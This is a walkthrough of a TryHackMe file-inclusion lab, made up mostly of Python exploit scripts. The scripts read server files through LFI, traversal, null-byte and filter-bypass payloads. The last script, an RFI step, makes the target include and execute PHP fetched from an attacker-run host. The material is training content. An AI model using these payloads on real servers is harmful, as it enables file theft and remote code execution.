Link: https://tryhackme.com/room/fileinc
This room introduces file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal.
I have solved all the challenges using Python, so feel free to run the code and check whether it works for you as well. Note that every script hard-codes the lab IP (10.10.72.183) and, for the RFI step, the attacker's listener address — replace both with your own before running.
Lab #1
import requests
import re
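pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)


def LFI(url, parameter, payload='/etc/passwd', timeout=10):
    """Detect an include()-based LFI on ``url`` and dump ``payload`` through it.

    Step 1 sends an empty value for ``parameter``; a vulnerable page leaks a
    PHP ``Warning ... include()`` message. Step 2 requests ``payload`` and
    prints the second ``<code>`` block of the page, which is where this lab
    renders the included file.

    Args:
        url: full URL of the lab page, e.g. ``http://host/lab1.php``.
        parameter: name of the GET parameter fed to include().
        payload: path to include (defaults to ``/etc/passwd``).
        timeout: per-request timeout in seconds so a dead or expired lab host
            fails fast instead of hanging the script.

    Returns:
        The decoded file contents when found, otherwise ``None``.
    """
    # The value is interpolated raw rather than passed via ``params=`` so that
    # pre-encoded payloads such as ``%00`` (used by later labs) reach the
    # server untouched; ``params=`` would re-encode ``%`` as ``%25``.
    probe = requests.get(f"{url}?{parameter}=", timeout=timeout)
    page = probe.content
    if not (probe.status_code == 200 and b"Warning" in page and b"include()" in page):
        return None
    print("*** Found LFI***")

    response = requests.get(f"{url}?{parameter}={payload}", timeout=timeout)
    matches = pattern.findall(response.content)
    if len(matches) < 2:
        # Page layout differs from the lab (or the include failed): report it
        # instead of dying with IndexError on ``matches[1]``.
        print(f"LFI found, but {payload} was not rendered in the response")
        return None
    # errors="replace": non-UTF-8 bytes in the dumped file must not abort the run.
    content = matches[1].decode("utf-8", errors="replace")
    print(content)
    return content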
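def main():
    """Entry point: verify the lab host answers, then run the LFI probe on lab1.php.

    The lab IP defaults to the one used in the write-up; pass a different one
    as the first command-line argument so the script works on a fresh instance.
    """
    import sys

    ip = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    base = 'http://' + ip + '/'
    try:
        # timeout: a wrong or expired lab IP should fail within seconds, not hang.
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab1.php', 'file')


if __name__ == "__main__":
    main()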
Lab #2
import requests
import re
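# Captures the directory PHP leaks in ``include(<dir>/"): failed to open stream``
# when the parameter value is a lone double quote. The literal is written with
# single quotes: as originally rendered (rb"include\((.*?)/"") the inner quote
# terminated the string early and the line did not parse.
pattern = re.compile(rb'include\((.*?)/"', re.DOTALL)


def LFI(url, parameter, payload='"', timeout=10):
    """Reveal the directory lab2.php includes from, via its PHP warning text.

    An empty value first confirms the page emits ``Warning ... include()``;
    then ``payload`` (a lone ``"``) is sent so the warning prints the full
    path the server prepends, which ``pattern`` extracts.

    Args:
        url: full URL of the lab page, e.g. ``http://host/lab2.php``.
        parameter: name of the GET parameter fed to include().
        payload: value that makes the warning show the include directory.
        timeout: per-request timeout in seconds (fail fast on a dead host).

    Returns:
        The leaked directory as text, or ``None`` if nothing was found.
    """
    # Raw interpolation (not ``params=``) keeps the payload exactly as written.
    probe = requests.get(f"{url}?{parameter}=", timeout=timeout)
    page = probe.content
    if not (probe.status_code == 200 and b"Warning" in page and b"include()" in page):
        return None
    print("*** Found Folder***")

    response = requests.get(f"{url}?{parameter}={payload}", timeout=timeout)
    matches = pattern.findall(response.content)
    if not matches:
        # Guard the original ``matches[0]``: no warning in the body means no path.
        print("include() warning present but no directory could be extracted")
        return None
    folder = matches[0].decode("utf-8", errors="replace")
    print(folder)
    return folder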
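def main():
    """Entry point: verify the lab host answers, then probe lab2.php.

    The lab IP defaults to the one used in the write-up; pass a different one
    as the first command-line argument so the script works on a fresh instance.
    """
    import sys

    ip = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    base = 'http://' + ip + '/'
    try:
        # timeout: a wrong or expired lab IP should fail within seconds, not hang.
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab2.php', 'file')


if __name__ == "__main__":
    main()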
Lab #3
import requests
import re
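pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)


def LFI(url, parameter, payload='../../../../etc/passwd%00', timeout=10):
    """Detect an include()-based LFI on lab3.php and read a file past its filter.

    The default payload combines directory traversal with a trailing ``%00``:
    the classic null-byte truncation, used when the server appends its own
    suffix (such as an extension) to the supplied name. The ``%00`` must be
    sent exactly as written, which is why the URL is built by string
    formatting and not with ``params=`` (that would encode it as ``%2500``).

    Args:
        url: full URL of the lab page, e.g. ``http://host/lab3.php``.
        parameter: name of the GET parameter fed to include().
        payload: traversal string to include.
        timeout: per-request timeout in seconds (fail fast on a dead host).

    Returns:
        The decoded file contents when found, otherwise ``None``.
    """
    probe = requests.get(f"{url}?{parameter}=", timeout=timeout)
    page = probe.content
    if not (probe.status_code == 200 and b"Warning" in page and b"include()" in page):
        return None
    print("*** Found LFI***")

    response = requests.get(f"{url}?{parameter}={payload}", timeout=timeout)
    matches = pattern.findall(response.content)
    if len(matches) < 2:
        # Avoid IndexError on ``matches[1]`` when the page layout differs.
        print(f"LFI found, but {payload} was not rendered in the response")
        return None
    content = matches[1].decode("utf-8", errors="replace")
    print(content)
    return content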
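def main():
    """Entry point: verify the lab host answers, then probe lab3.php.

    The lab IP defaults to the one used in the write-up; pass a different one
    as the first command-line argument so the script works on a fresh instance.
    """
    import sys

    ip = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    base = 'http://' + ip + '/'
    try:
        # timeout: a wrong or expired lab IP should fail within seconds, not hang.
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab3.php', 'file')


if __name__ == "__main__":
    main()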
Lab #4
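import requests


def LFI(url, parameter, timeout=10):
    """Fingerprint the PHP file function behind lab4.php from its error text.

    Sending an empty value for ``parameter`` makes the page emit a warning that
    names the function; this lab looks for ``file_get_contents``. Unlike
    include(), that function only reads the file, so a hit here is a file
    disclosure rather than code execution.

    Args:
        url: full URL of the lab page, e.g. ``http://host/lab4.php``.
        parameter: name of the GET parameter the page passes to the function.
        timeout: per-request timeout in seconds (fail fast on a dead host).

    Returns:
        True when ``file_get_contents`` appears in a 200 response, else False.
    """
    response = requests.get(f"{url}?{parameter}=", timeout=timeout)
    found = response.status_code == 200 and b"file_get_contents" in response.content
    if found:
        print("*** Found Function***")
        print("file_get_contents")
    return found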
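def main():
    """Entry point: verify the lab host answers, then fingerprint lab4.php.

    The lab IP defaults to the one used in the write-up; pass a different one
    as the first command-line argument so the script works on a fresh instance.
    """
    import sys

    ip = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    base = 'http://' + ip + '/'
    try:
        # timeout: a wrong or expired lab IP should fail within seconds, not hang.
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab4.php', 'file')


if __name__ == "__main__":
    main()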
Lab #5
import requests
import re
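pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)


def LFI(url, parameter, payload='....//....//....//....//etc/passwd', timeout=10):
    """Detect an include()-based LFI on lab5.php and bypass its traversal filter.

    The default payload uses ``....//`` instead of ``../``: when a filter strips
    ``../`` once and non-recursively, each ``....//`` collapses back into ``../``
    after the strip, so the traversal survives. The value is interpolated raw
    (not via ``params=``) so it reaches the server exactly as written.

    Args:
        url: full URL of the lab page, e.g. ``http://host/lab5.php``.
        parameter: name of the GET parameter fed to include().
        payload: filter-bypassing traversal string to include.
        timeout: per-request timeout in seconds (fail fast on a dead host).

    Returns:
        The decoded file contents when found, otherwise ``None``.
    """
    probe = requests.get(f"{url}?{parameter}=", timeout=timeout)
    page = probe.content
    if not (probe.status_code == 200 and b"Warning" in page and b"include()" in page):
        return None
    print("*** Found LFI***")

    response = requests.get(f"{url}?{parameter}={payload}", timeout=timeout)
    matches = pattern.findall(response.content)
    if len(matches) < 2:
        # Avoid IndexError on ``matches[1]`` when the page layout differs.
        print(f"LFI found, but {payload} was not rendered in the response")
        return None
    content = matches[1].decode("utf-8", errors="replace")
    print(content)
    return content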
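def main():
    """Entry point: verify the lab host answers, then probe lab5.php.

    The lab IP defaults to the one used in the write-up; pass a different one
    as the first command-line argument so the script works on a fresh instance.
    """
    import sys

    ip = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    base = 'http://' + ip + '/'
    try:
        # timeout: a wrong or expired lab IP should fail within seconds, not hang.
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab5.php', 'file')


if __name__ == "__main__":
    main()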
Lab #6
import requests
import re
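pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)


def LFI(url, parameter, payload='THM-profile/../../../../etc/os-release', timeout=10):
    """Detect lab6.php's prefix check and traverse out of the allowed directory.

    This lab answers ``Access Denied`` (rather than a PHP warning) when the
    value is empty, so that string is the detection marker. The default payload
    keeps the ``THM-profile/`` prefix the page appears to require and then
    traverses out of it to reach ``/etc/os-release``.

    Args:
        url: full URL of the lab page, e.g. ``http://host/lab6.php``.
        parameter: name of the GET parameter fed to the include.
        payload: prefixed traversal string to include.
        timeout: per-request timeout in seconds (fail fast on a dead host).

    Returns:
        The decoded file contents when found, otherwise ``None``.
    """
    probe = requests.get(f"{url}?{parameter}=", timeout=timeout)
    if not (probe.status_code == 200 and b"Access Denied" in probe.content):
        return None
    print("*** Found LFI***")

    # Raw interpolation keeps the traversal exactly as written.
    response = requests.get(f"{url}?{parameter}={payload}", timeout=timeout)
    matches = pattern.findall(response.content)
    if len(matches) < 2:
        # Avoid IndexError on ``matches[1]`` when the page layout differs.
        print(f"LFI found, but {payload} was not rendered in the response")
        return None
    content = matches[1].decode("utf-8", errors="replace")
    print(content)
    return content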
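def main():
    """Entry point: verify the lab host answers, then probe lab6.php.

    The lab IP defaults to the one used in the write-up; pass a different one
    as the first command-line argument so the script works on a fresh instance.
    """
    import sys

    ip = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    base = 'http://' + ip + '/'
    try:
        # timeout: a wrong or expired lab IP should fail within seconds, not hang.
        response = requests.get(base, timeout=10)
    except requests.RequestException as exc:
        print(f"Error, check the URL ({exc})")
        return
    if response.status_code != 200:
        print("Error, check the URL")
        return
    LFI(base + 'lab6.php', 'file')


if __name__ == "__main__":
    main()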
flag1
import requests
import re
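pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)


def main():
    """Challenge 1: read ``/etc/flag1`` through a ``file`` parameter sent by POST.

    The target host defaults to the write-up's lab IP; pass another as the
    first command-line argument to reuse the script on a fresh instance.
    """
    import sys

    host = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    url = f'http://{host}/challenges/chall1.php'
    # This challenge reads the parameter from the POST body, not the query string.
    response = requests.post(url, data={"file": "/etc/flag1"}, timeout=10)
    matches = pattern.findall(response.content)
    if len(matches) < 2:
        # Guard the original ``matches[1]`` lookup instead of crashing.
        print("flag not found in the response; the page layout may differ")
        return
    print(matches[1].decode("utf-8", errors="replace"))


if __name__ == '__main__':
    main()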
flag2
import requests
import re
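# The flag sits after a closing </div> inside the <code> block on this page,
# hence the extra ``.*</div>`` before the capture group.
pattern = re.compile(rb"<code>.*</div>(.*?)</code>", re.DOTALL)


def main():
    """Challenge 2: the include path comes from the ``THM`` cookie, not a parameter.

    The cookie value carries a traversal string ending in ``%00``; it is sent
    literally so the server side turns it into the null byte that truncates
    whatever the page appends. The lab IP defaults to the write-up's; pass
    another as the first command-line argument to reuse the script.
    """
    import sys

    host = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    url = f'http://{host}/challenges/chall2.php'
    cookie = {"THM": "../../../../etc/flag2%00"}
    response = requests.get(url, cookies=cookie, timeout=10)
    matches = pattern.findall(response.content)
    if not matches:
        # Guard the original ``matches[0]`` lookup instead of crashing.
        print("flag not found in the response; the page layout may differ")
        return
    print(matches[0].decode("utf-8", errors="replace"))


if __name__ == '__main__':
    main()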
flag3
import requests
import re
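pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)


def main():
    """Challenge 3: POST a traversal path with a raw null byte to read ``/etc/flag3``.

    Here the null byte is an actual ``\\x00`` character in the form value
    (requests percent-encodes it on the wire), unlike challenge 2 which sends
    the literal text ``%00``. The lab IP defaults to the write-up's; pass
    another as the first command-line argument to reuse the script.
    """
    import sys

    host = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    url = f'http://{host}/challenges/chall3.php'
    response = requests.post(url, data={"file": "../../../../etc/flag3\x00"}, timeout=10)
    matches = pattern.findall(response.content)
    if len(matches) < 2:
        # Guard the original ``matches[1]`` lookup instead of crashing.
        print("flag not found in the response; the page layout may differ")
        return
    print(matches[1].decode("utf-8", errors="replace"))


if __name__ == '__main__':
    main()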
rce.txt (served from the attacker machine over HTTP on port 8000 — the address rce.py points the vulnerable include() at)
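<?php
// Remote-file-inclusion payload fetched by playground.php?file=http://ATTACKER/rce.txt.
// PHP only fetches a remote URL through include() when allow_url_include is on.
// system() already prints the command output and returns only its last line,
// so "echo system('hostname')" printed the hostname twice; a bare call prints it once.
system('hostname');
?>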
rce.py
import requests
import re
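pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)


def main():
    """RFI: make playground.php include ``rce.txt`` served from the attacker host.

    ``argv[1]`` overrides the target IP and ``argv[2]`` the attacker
    ``host:port`` serving ``rce.txt``; the defaults are the write-up's
    addresses, which will not match your own lab session.
    """
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else '10.10.72.183'
    attacker = sys.argv[2] if len(sys.argv) > 2 else '10.13.22.219:8000'
    # The remote URL is left unencoded on purpose so include() sees a literal
    # http:// scheme; that only works when allow_url_include is enabled.
    url = f'http://{target}/playground.php?file=http://{attacker}/rce.txt'
    response = requests.get(url, timeout=10)
    matches = pattern.findall(response.content)
    if len(matches) < 2:
        # Guard the original ``matches[1]`` lookup instead of crashing.
        print("no command output found; check that rce.txt is being served "
              "and that the target allows remote includes")
        return
    print(matches[1].decode("utf-8", errors="replace"))


if __name__ == '__main__':
    main()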
Hooray!!!